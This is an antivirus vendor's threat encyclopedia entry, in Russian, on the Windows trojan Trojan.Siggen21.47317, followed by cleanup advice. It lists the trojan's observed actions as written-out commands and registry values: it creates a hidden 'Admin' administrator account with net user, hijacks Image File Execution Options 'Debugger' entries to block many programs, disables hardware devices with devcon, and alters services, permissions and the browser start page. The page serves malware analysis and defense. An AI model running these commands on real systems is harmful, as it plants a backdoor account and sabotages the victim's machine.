Поддержка
Круглосуточная поддержка

Позвоните

Бесплатно по России:
8-800-333-79-32

ЧаВо | Форум

Ваши запросы

  • Все: -
  • Незакрытые: -
  • Последний: -

Позвоните

Бесплатно по России:
8-800-333-79-32

Свяжитесь с нами Незакрытые запросы: 

Профиль

Профиль

Trojan.Siggen21.47317

Добавлен в вирусную базу Dr.Web: 2023-10-22

Описание добавлено:

Техническая информация

Для обеспечения автозапуска и распространения
Модифицирует следующие ключи реестра
  • [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wxweb.exe] 'Debugger' = 'Debugfile.exe'
  • [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wxGameActivity.exe] 'Debugger' = 'Debugfile.exe'
  • [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\desktoplauncher.exe] 'Debugger' = 'Debugfile.exe'
  • [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\DesktopStart.exe] 'Debugger' = 'Debugfile.exe'
  • [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\deskstart.exe] 'Debugger' = 'Debugfile.exe'
  • [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BmRender.exe] 'Debugger' = 'Debugfile.exe'
  • [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bmmotor.exe] 'Debugger' = 'Debugfile.exe'
  • [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BmInstaller.exe] 'Debugger' = 'Debugfile.exe'
  • [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LOLHelper.exe] 'Debugger' = 'Debugfile.exe'
  • [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LOLweb.exe] 'Debugger' = 'Debugfile.exe'
  • [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wx8016.exe] 'Debugger' = 'Debugfile.exe'
  • [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\swdcapp.exe] 'Debugger' = 'Debugfile.exe'
  • [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\swacapp.exe] 'Debugger' = 'Debugfile.exe'
  • [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AppUtilHD2.exe] 'Debugger' = 'Debugfile.exe'
  • [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AppUtilHD.exe] 'Debugger' = 'Debugfile.exe'
  • [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LoadDTClient.exe] 'Debugger' = 'Debugfile.exe'
  • [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SndoPlug.exe] 'Debugger' = 'Debugfile.exe'
  • [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\CBGUARD.exe] 'Debugger' = 'Debugfile.exe'
  • [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\PPSpeedUp.exe] 'Debugger' = 'Debugfile.exe'
  • [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\accclient.exe] 'Debugger' = 'Debugfile.exe'
  • [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\acclauncher.exe] 'Debugger' = 'Debugfile.exe'
  • [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\unsecapp.exe] 'Debugger' = 'Debugfile.exe'
  • [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\crashreport.exe] 'Debugger' = 'Debugfile.exe'
  • [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\GameDock.exe] 'Debugger' = 'Debugfile.exe'
  • [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\steamwnd.exe] 'Debugger' = 'Debugfile.exe'
  • [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\steaminsidewnd.exe] 'Debugger' = 'Debugfile.exe'
  • [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\generalwnd.exe] 'Debugger' = 'Debugfile.exe'
  • [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SteamPop.exe] 'Debugger' = 'Debugfile.exe'
  • [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BCweb.exe] 'Debugger' = 'Debugfile.exe'
  • [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\BarClientSafeCenter.exe] 'Debugger' = 'Debugfile.exe'
  • [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\gameactivity.exe] 'Debugger' = 'Debugfile.exe'
  • [HKLM\SOFTWARE\Classes\htmlfile\shell\open\command] '' = '"%ProgramFiles(x86)%\Internet Explorer\IEXPLORE.EXE" -nohome'
Устанавливает следующие настройки сервисов
  • [HKLM\SYSTEM\CurrentControlSet\Services\Dhcp] 'Start' = '00000002'
  • [HKLM\SYSTEM\ControlSet001\Services\Dhcp] 'Start' = '00000002'
  • [HKLM\SYSTEM\CurrentControlSet\Services\EventLog] 'Start' = '00000002'
  • [HKLM\SYSTEM\ControlSet001\Services\EventLog] 'Start' = '00000002'
Вредоносные функции
Запускает на исполнение
  • '<SYSTEM32>\net.exe' user Admin Password /add
  • '<SYSTEM32>\net.exe' LocalGroup Administrators Admin /add
Без разрешения пользователя устанавливает новую стартовую страницу для Windows Internet Explorer.
Изменения в файловой системе
Создает следующие файлы
  • %TEMP%\auta498.tmp
  • <SYSTEM32>\syspin.exe
  • %TEMP%\auta525.tmp
  • <SYSTEM32>\setacl.exe
  • %TEMP%\auta555.tmp
  • <SYSTEM32>\netuser.exe
  • %TEMP%\auta565.tmp
  • <SYSTEM32>\devcon_x64.exe
  • %TEMP%\auta566.tmp
  • %HOMEPATH%\desktop\internet explorer.exe
  • %TEMP%\auta5b5.tmp
  • %HOMEPATH%\desktop\常用工具.exe
  • %TEMP%\auta624.tmp
  • %HOMEPATH%\desktop\360极速浏览器.exe
  • %TEMP%\autf7bd.tmp
  • <SYSTEM32>\usbaudio.ini
Удаляет следующие файлы
  • %TEMP%\auta498.tmp
  • %TEMP%\auta525.tmp
  • %TEMP%\auta555.tmp
  • %TEMP%\auta565.tmp
  • %TEMP%\auta566.tmp
  • %TEMP%\auta5b5.tmp
  • %TEMP%\auta624.tmp
  • %TEMP%\autf7bd.tmp
Изменяет следующие файлы
  • %LOCALAPPDATA%\google\chrome\user data\local state
  • %APPDATA%\microsoft\windows\start menu\programs\internet explorer (64-bit).lnk
  • %APPDATA%\microsoft\windows\start menu\programs\desktop.ini
Другое
Создает и запускает на исполнение
  • '<SYSTEM32>\devcon_x64.exe' disable "PCI\VEN_1022&DEV_1485&*"
  • '<SYSTEM32>\devcon_x64.exe' disable "PCI\VEN_8086&DEV_A2A1&*"
  • '<SYSTEM32>\devcon_x64.exe' disable "PCI\VEN_8086&DEV_7AA4&*"
  • '<SYSTEM32>\devcon_x64.exe' disable "PCI\VEN_8086&DEV_A3A1&*"
  • '<SYSTEM32>\devcon_x64.exe' disable "PCI\VEN_8086&DEV_A3B1&*"
  • '<SYSTEM32>\devcon_x64.exe' disable "PCI\VEN_8086&DEV_06F9&*"
  • '<SYSTEM32>\devcon_x64.exe' disable "PCI\VEN_1022&DEV_1486&*"
  • '<SYSTEM32>\devcon_x64.exe' disable "ACPI\VEN_INTC&DEV_1056*"
  • '<SYSTEM32>\devcon_x64.exe' disable "PCI\VEN_10DE&DEV_1AED&*"
  • '<SYSTEM32>\devcon_x64.exe' disable "PCI\VEN_8086&DEV_1911&*"
  • '<SYSTEM32>\devcon_x64.exe' disable "PCI\VEN_8086&DEV_06A4&*"
  • '<SYSTEM32>\devcon_x64.exe' disable "PCI\VEN_1022&DEV_148A&*"
  • '<SYSTEM32>\devcon_x64.exe' disable "PCI\VEN_8086&DEV_467D&*"
  • '<SYSTEM32>\devcon_x64.exe' find usb\class_01
  • '<SYSTEM32>\devcon_x64.exe' disable "PCI\VEN_8086&DEV_7AE8&*"
  • '<SYSTEM32>\devcon_x64.exe' disable "PCI\VEN_8086&DEV_7AFC&*"
  • '<SYSTEM32>\devcon_x64.exe' disable "PCI\VEN_10DE&DEV_1AD9&*"
  • '<SYSTEM32>\devcon_x64.exe' disable "PCI\VEN_8086&DEV_7ACC&*"
  • '<SYSTEM32>\devcon_x64.exe' disable "PCI\VEN_8086&DEV_7ACF&*"
  • '<SYSTEM32>\devcon_x64.exe' disable "PCI\VEN_8086&DEV_7ACD&*"
  • '<SYSTEM32>\devcon_x64.exe' disable "PCI\VEN_8086&DEV_7AA3&*"
  • '<SYSTEM32>\devcon_x64.exe' disable "PCI\VEN_8086&DEV_7ACE&*"
  • '<SYSTEM32>\devcon_x64.exe' disable "PCI\VEN_8086&DEV_A3A3&*"
  • '<SYSTEM32>\devcon_x64.exe' disable "PCI\VEN_8086&DEV_8C22&*"
  • '<SYSTEM32>\devcon_x64.exe' disable "PCI\VEN_8086&DEV_041E&*"
  • '<SYSTEM32>\devcon_x64.exe' disable "PCI\VEN_8086&DEV_8C02*"
  • '<SYSTEM32>\devcon_x64.exe' disable "USB\VID_0D8C&PID_000A&REV_*"
  • '<SYSTEM32>\devcon_x64.exe' disable "HDAUDIO\FUNC_01&VEN_10DE&DEV_*"
  • '<SYSTEM32>\devcon_x64.exe' disable "ACPI\VEN_AMDI&DEV_0030"
  • '<SYSTEM32>\devcon_x64.exe' disable "ACPI\VEN_AMDI&DEV_F030"
  • '<SYSTEM32>\devcon_x64.exe' disable "PCI\VEN_8086&DEV_06E0&*"
  • '<SYSTEM32>\netuser.exe' Admin /pwnexp:y
  • '<SYSTEM32>\devcon_x64.exe' disable "PCI\VEN_8086&DEV_A13A&*"
  • '<SYSTEM32>\devcon_x64.exe' disable "PCI\VEN_8086&DEV_7AFD&*"
  • '<SYSTEM32>\devcon_x64.exe' disable "PCI\VEN_8086&DEV_A2A3&*"
  • '<SYSTEM32>\devcon_x64.exe' disable "PCI\VEN_8086&DEV_1E3A&*"
  • '<SYSTEM32>\devcon_x64.exe' disable "PCI\VEN_8086&DEV_A3BA&*"
  • '<SYSTEM32>\devcon_x64.exe' disable "PCI\VEN_8086&DEV_A2BA&*"
  • '<SYSTEM32>\devcon_x64.exe' disable "PCI\VEN_8086&DEV_A123&*"
  • '<SYSTEM32>\devcon_x64.exe' disable "PCI\VEN_8086&DEV_8C3A&*"
  • '<SYSTEM32>\devcon_x64.exe' disable "PCI\VEN_8086&DEV_A121&*"
  • '<SYSTEM32>\cmd.exe' /c devcon_x64 disable "PCI\VEN_8086&DEV_A3A3&*"' (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c devcon_x64 disable "ACPI\VEN_AMDI&DEV_0030"' (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c devcon_x64 disable "PCI\VEN_8086&DEV_1911&*"' (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c devcon_x64 disable "PCI\VEN_8086&DEV_467D&*"' (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c devcon_x64 disable "USB\VID_0D8C&PID_000A&REV_*"' (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c devcon_x64 disable "PCI\VEN_8086&DEV_7ACF&*"' (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c devcon_x64 disable "PCI\VEN_8086&DEV_8C22&*"' (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c devcon_x64 find usb\class_01 ><SYSTEM32>\USBAudio.ini' (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c devcon_x64 disable "PCI\VEN_8086&DEV_041E&*"' (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c devcon_x64 disable "PCI\VEN_8086&DEV_A121&*"' (со скрытым окном)
  • '<SYSTEM32>\net.exe' Start EventLog' (со скрытым окном)
  • '<SYSTEM32>\sc.exe' Config Dhcp Start= Auto' (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c devcon_x64 disable "PCI\VEN_8086&DEV_A2A3&*"' (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c devcon_x64 disable "ACPI\VEN_INTC&DEV_1056*"' (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c devcon_x64 disable "HDAUDIO\FUNC_01&VEN_10DE&DEV_*"' (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c devcon_x64 disable "PCI\VEN_8086&DEV_A123&*"' (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /C net user Admin Password /add' (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c devcon_x64 disable "PCI\VEN_8086&DEV_7AA4&*"' (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /C net LocalGroup Administrators Admin /add' (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /C NetUser Admin /pwnexp:y' (со скрытым окном)
  • '<SYSTEM32>\net.exe' Start Dhcp' (со скрытым окном)
  • '<SYSTEM32>\sc.exe' Config EventLog Start= Auto' (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c devcon_x64 disable "PCI\VEN_8086&DEV_7AA3&*"' (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c devcon_x64 disable "PCI\VEN_8086&DEV_7AFC&*"' (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c devcon_x64 disable "PCI\VEN_8086&DEV_A3BA&*"' (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c devcon_x64 disable "PCI\VEN_8086&DEV_06F9&*"' (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c devcon_x64 disable "PCI\VEN_8086&DEV_8C02*"' (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c devcon_x64 disable "PCI\VEN_8086&DEV_A2A1&*"' (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c devcon_x64 disable "PCI\VEN_8086&DEV_06E0&*"' (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c devcon_x64 disable "PCI\VEN_8086&DEV_7AFD&*"' (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c devcon_x64 disable "ACPI\VEN_AMDI&DEV_F030"' (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c devcon_x64 disable "PCI\VEN_8086&DEV_8C3A&*"' (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c devcon_x64 disable "PCI\VEN_8086&DEV_1E3A&*"' (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c devcon_x64 disable "PCI\VEN_8086&DEV_A13A&*"' (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c devcon_x64 disable "PCI\VEN_8086&DEV_A3A1&*"' (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c devcon_x64 disable "PCI\VEN_8086&DEV_A2BA&*"' (со скрытым окном)
  • '<SYSTEM32>\netsh.exe' ipsec static set policy name=saiteng assign=n' (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c devcon_x64 disable "PCI\VEN_8086&DEV_A3B1&*"' (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c devcon_x64 disable "PCI\VEN_1022&DEV_1486&*"' (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c devcon_x64 disable "PCI\VEN_10DE&DEV_1AED&*"' (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c devcon_x64 disable "PCI\VEN_10DE&DEV_1AD9&*"' (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c devcon_x64 disable "PCI\VEN_8086&DEV_06A4&*"' (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c devcon_x64 disable "PCI\VEN_1022&DEV_148A&*"' (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c devcon_x64 disable "PCI\VEN_1022&DEV_1485&*"' (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c devcon_x64 disable "PCI\VEN_8086&DEV_7AE8&*"' (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c devcon_x64 disable "PCI\VEN_8086&DEV_7ACC&*"' (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c devcon_x64 disable "PCI\VEN_8086&DEV_7ACE&*"' (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /C Icacls "C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\PepperFlash" /Deny Administrators:(WD,AD)' (со скрытым окном)
  • '<SYSTEM32>\cmd.exe' /c devcon_x64 disable "PCI\VEN_8086&DEV_7ACD&*"' (со скрытым окном)
  • '<SYSTEM32>\ie4uinit.exe' -show' (со скрытым окном)
Запускает на исполнение
  • '<SYSTEM32>\cmd.exe' /C net user Admin Password /add
  • '<SYSTEM32>\cmd.exe' /c devcon_x64 disable "PCI\VEN_8086&DEV_06A4&*"
  • '<SYSTEM32>\cmd.exe' /c devcon_x64 disable "PCI\VEN_1022&DEV_148A&*"
  • '<SYSTEM32>\cmd.exe' /c devcon_x64 disable "PCI\VEN_1022&DEV_1485&*"
  • '<SYSTEM32>\cmd.exe' /c devcon_x64 disable "PCI\VEN_8086&DEV_7AE8&*"
  • '<SYSTEM32>\cmd.exe' /c devcon_x64 disable "PCI\VEN_8086&DEV_7ACC&*"
  • '<SYSTEM32>\cmd.exe' /c devcon_x64 disable "PCI\VEN_8086&DEV_7ACD&*"
  • '<SYSTEM32>\cmd.exe' /c devcon_x64 disable "PCI\VEN_8086&DEV_7ACE&*"
  • '<SYSTEM32>\cmd.exe' /c devcon_x64 disable "PCI\VEN_8086&DEV_7AA4&*"
  • '<SYSTEM32>\cmd.exe' /c devcon_x64 disable "PCI\VEN_8086&DEV_7AFD&*"
  • '<SYSTEM32>\cmd.exe' /c devcon_x64 disable "PCI\VEN_8086&DEV_7ACF&*"
  • '<SYSTEM32>\cmd.exe' /c devcon_x64 disable "PCI\VEN_8086&DEV_7AFC&*"
  • '<SYSTEM32>\cmd.exe' /c devcon_x64 disable "PCI\VEN_8086&DEV_7AA3&*"
  • '<SYSTEM32>\cmd.exe' /c devcon_x64 find usb\class_01 ><SYSTEM32>\USBAudio.ini
  • '<SYSTEM32>\cmd.exe' /c devcon_x64 disable "ACPI\VEN_INTC&DEV_1056*"
  • '<SYSTEM32>\cmd.exe' /c devcon_x64 disable "PCI\VEN_8086&DEV_1911&*"
  • '<SYSTEM32>\cmd.exe' /c devcon_x64 disable "PCI\VEN_8086&DEV_041E&*"
  • '<SYSTEM32>\cmd.exe' /c devcon_x64 disable "PCI\VEN_8086&DEV_8C22&*"
  • '<SYSTEM32>\cmd.exe' /c devcon_x64 disable "PCI\VEN_8086&DEV_A123&*"
  • '<SYSTEM32>\cmd.exe' /c devcon_x64 disable "PCI\VEN_8086&DEV_A2A3&*"
  • '<SYSTEM32>\cmd.exe' /c devcon_x64 disable "PCI\VEN_8086&DEV_A3A3&*"
  • '<SYSTEM32>\cmd.exe' /c devcon_x64 disable "ACPI\VEN_AMDI&DEV_F030"
  • '<SYSTEM32>\cmd.exe' /c devcon_x64 disable "ACPI\VEN_AMDI&DEV_0030"
  • '<SYSTEM32>\cmd.exe' /c devcon_x64 disable "HDAUDIO\FUNC_01&VEN_10DE&DEV_*"
  • '<SYSTEM32>\cmd.exe' /c devcon_x64 disable "USB\VID_0D8C&PID_000A&REV_*"
  • '<SYSTEM32>\cmd.exe' /c devcon_x64 disable "PCI\VEN_10DE&DEV_1AD9&*"
  • '<SYSTEM32>\cmd.exe' /c devcon_x64 disable "PCI\VEN_8086&DEV_467D&*"
  • '<SYSTEM32>\cmd.exe' /c devcon_x64 disable "PCI\VEN_10DE&DEV_1AED&*"
  • '<SYSTEM32>\cmd.exe' /C Icacls "C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\PepperFlash" /Deny Administrators:(WD,AD)
  • '<SYSTEM32>\net1.exe' user Admin Password /add
  • '<SYSTEM32>\cmd.exe' /C net LocalGroup Administrators Admin /add
  • '<SYSTEM32>\net1.exe' LocalGroup Administrators Admin /add
  • '<SYSTEM32>\cmd.exe' /C NetUser Admin /pwnexp:y
  • '<SYSTEM32>\sc.exe' Config Dhcp Start= Auto
  • '<SYSTEM32>\net.exe' Start Dhcp
  • '<SYSTEM32>\net1.exe' Start Dhcp
  • '<SYSTEM32>\sc.exe' Config EventLog Start= Auto
  • '<SYSTEM32>\net.exe' Start EventLog
  • '<SYSTEM32>\net1.exe' Start EventLog
  • '<SYSTEM32>\netsh.exe' ipsec static set policy name=saiteng assign=n
  • '<SYSTEM32>\icacls.exe' "C:\Users\Administrator\AppData\Local\Google\Chrome\User Data\PepperFlash" /Deny Administrators:(WD,AD)
  • '<SYSTEM32>\cmd.exe' /c devcon_x64 disable "PCI\VEN_8086&DEV_06F9&*"
  • '<SYSTEM32>\cmd.exe' /c devcon_x64 disable "PCI\VEN_8086&DEV_8C02*"
  • '<SYSTEM32>\cmd.exe' /c devcon_x64 disable "PCI\VEN_8086&DEV_8C3A&*"
  • '<SYSTEM32>\cmd.exe' /c devcon_x64 disable "PCI\VEN_8086&DEV_A13A&*"
  • '<SYSTEM32>\cmd.exe' /c devcon_x64 disable "PCI\VEN_8086&DEV_1E3A&*"
  • '<SYSTEM32>\cmd.exe' /c devcon_x64 disable "PCI\VEN_8086&DEV_A2BA&*"
  • '<SYSTEM32>\cmd.exe' /c devcon_x64 disable "PCI\VEN_8086&DEV_A3BA&*"
  • '<SYSTEM32>\cmd.exe' /c devcon_x64 disable "PCI\VEN_8086&DEV_06E0&*"
  • '<SYSTEM32>\cmd.exe' /c devcon_x64 disable "PCI\VEN_8086&DEV_A121&*"
  • '<SYSTEM32>\cmd.exe' /c devcon_x64 disable "PCI\VEN_8086&DEV_A2A1&*"
  • '<SYSTEM32>\cmd.exe' /c devcon_x64 disable "PCI\VEN_8086&DEV_A3A1&*"
  • '<SYSTEM32>\cmd.exe' /c devcon_x64 disable "PCI\VEN_8086&DEV_A3B1&*"
  • '<SYSTEM32>\cmd.exe' /c devcon_x64 disable "PCI\VEN_1022&DEV_1486&*"
  • '<SYSTEM32>\ie4uinit.exe' -show

Рекомендации по лечению

  1. В случае если операционная система способна загрузиться (в штатном режиме или режиме защиты от сбоев), скачайте лечащую утилиту Dr.Web CureIt! и выполните с ее помощью полную проверку вашего компьютера, а также используемых вами переносных носителей информации.
  2. Если загрузка операционной системы невозможна, измените настройки BIOS вашего компьютера, чтобы обеспечить возможность загрузки ПК с компакт-диска или USB-накопителя. Скачайте образ аварийного диска восстановления системы Dr.Web® LiveDisk или утилиту записи Dr.Web® LiveDisk на USB-накопитель, подготовьте соответствующий носитель. Загрузив компьютер с использованием данного носителя, выполните его полную проверку и лечение обнаруженных угроз.
Скачать Dr.Web

По серийному номеру

Выполните полную проверку системы с использованием Антивируса Dr.Web Light для macOS. Данный продукт можно загрузить с официального сайта Apple App Store.

На загруженной ОС выполните полную проверку всех дисковых разделов с использованием продукта Антивирус Dr.Web для Linux.

Скачать Dr.Web

По серийному номеру

  1. Если мобильное устройство функционирует в штатном режиме, загрузите и установите на него бесплатный антивирусный продукт Dr.Web для Android Light. Выполните полную проверку системы и используйте рекомендации по нейтрализации обнаруженных угроз.
  2. Если мобильное устройство заблокировано троянцем-вымогателем семейства Android.Locker (на экране отображается обвинение в нарушении закона, требование выплаты определенной денежной суммы или иное сообщение, мешающее нормальной работе с устройством), выполните следующие действия:
    • загрузите свой смартфон или планшет в безопасном режиме (в зависимости от версии операционной системы и особенностей конкретного мобильного устройства эта процедура может быть выполнена различными способами; обратитесь за уточнением к инструкции, поставляемой вместе с приобретенным аппаратом, или напрямую к его производителю);
    • после активации безопасного режима установите на зараженное устройство бесплатный антивирусный продукт Dr.Web для Android Light и произведите полную проверку системы, выполнив рекомендации по нейтрализации обнаруженных угроз;
    • выключите устройство и включите его в обычном режиме.

Подробнее о Dr.Web для Android

Демо бесплатно на 14 дней

Выдаётся при установке